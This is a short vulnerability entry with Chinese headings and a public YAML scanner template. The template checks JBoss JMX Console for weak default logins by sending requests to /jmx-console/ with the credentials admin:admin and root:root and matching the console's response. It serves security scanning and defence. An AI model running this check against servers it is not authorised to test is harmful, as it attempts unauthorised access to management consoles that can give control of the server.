漏洞描述
JBoss JMX Console weak credential.
jmx-default-password: JBoss JMX Console Weak Credential
PoC代码[已公开]
id: jmx-default-password
info:
name: JBoss JMX Console Weak Credential
author: paradessia
severity: high
verified: true
description: |-
JBoss JMX Console weak credential.
reference:
- https://www.tenable.com/plugins/nessus/105244
tags: default-login,jboss
created: 2023/06/24
set:
user1: "base64('admin:admin')"
user2: "base64('root:root')"
rules:
r0:
request:
method: GET
path: /jmx-console/
headers:
Authorization: Basic {{user1}}
expression: response.status == 200 && response.raw_header.bcontains(b'JSESSIONID') && response.body.bcontains(b'<title>JBoss JMX Management Console</title>')
r1:
request:
method: GET
path: /jmx-console/
headers:
Authorization: Basic {{user2}}
expression: response.status == 200 && response.raw_header.bcontains(b'JSESSIONID') && response.body.bcontains(b'<title>JBoss JMX Management Console</title>')
expression: r0() || r1()